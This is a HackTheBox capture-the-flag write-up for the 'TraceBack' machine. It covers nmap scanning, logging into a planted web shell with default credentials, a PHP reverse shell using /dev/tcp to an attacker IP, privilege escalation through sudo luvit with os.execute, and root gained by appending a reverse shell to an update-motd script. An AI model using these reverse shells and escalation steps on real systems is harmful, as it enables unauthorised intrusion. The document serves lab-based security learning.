TraceBack from HackTheBox

TraceBack from HackTheBox

The process begins by finding a reverse shell present on the box to get a reverse shell. Then, it involves pivoting to another user to own user using Lua. Finally, by exploiting a cleanup script running as root, we can obtain the root shell.

Nmap scan


Usually I start with nmap scan

nmap -sV -sC 10.10.10.181 -v
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have ssh and web ports open.

Web enumeration

Checking the website:

Seems like we have something to do with web reverse shell.

Running dirbuster didn't return anything useful so I've took a look at the page source:

<body>
	<center>
		<h1>This site has been owned</h1>
		<h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
		<h3> - Xh4H - </h3>
		<!--Some of the best web shells that you might need ;)-->
	</center>
</body>

Xh4H (the box creator) with a hint : Some of the best web shells that you might need.
Searching for : Xh4H web shells, I've found a tweet that lead to a list of reverse shell created by this user.

By trying each one against the box URL , smevk.php worked!
Going to: http://10.10.10.181/smevk.php
It’s a login page, trying default creds (admin:admin) allowed me to login.

Getting first shell

There is a browse option. As we know that php is allowed, let’s upload a simple php reverse shell

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.81/1234 0>&1'");
?>

Save it as rev.php and browse for it then click on the >> symbol to upload the shell.
Now rev.php appears into the file manager.

Listen to port 1234 (don’t forget to change the ip and port in the rev.php)

rlwrap nc -vlp 1234

To execute the reverse shell, just visit http://10.10.10.181/rev.php

And got a shell back!

Own user

Before doing any work, it's better to upgrade the shell first:

python -c 'import pty;pty.spawn("/bin/bash")'

Enumeration

By searching in the home dir of the webadmin user, I've found a note.txt

- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

It’s a message from the sysadmin user , looks like I can use a tool to execute a lua code.
Running sudo -l reveals that webadmin can execute the luvit binary without password as sysadmin.

After searching for how to execute system command using lua, I was able to find a simple way to execute lua command.

Creating a lua shell:

echo "local t = os.execute('/bin/sh')" > rev.lua

Now executing the command:

sudo -u sysadmin /home/sysadmin/luvit rev.lua

Got a shell as user sysadmin!

Own root

Enumeration

Pspy64 shows a command running as root. The system copies the files in /var/backups/.update-motd.d/ to /etc/update-motd.d/ every 30 seconds.
After a while , I've noticed that is executed on every ssh login, and the command in 00-header will be executed as root.

Get a shell as root

I've added a bash reverse shell to 00-header:

echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.81/4444 0>&1'" >> /etc/update-motd.d/00-header

Listening on port 4444 and ssh to the box from another terminal returned a root shell:

Finally the box is rooted :) . Your feedback is appreciated !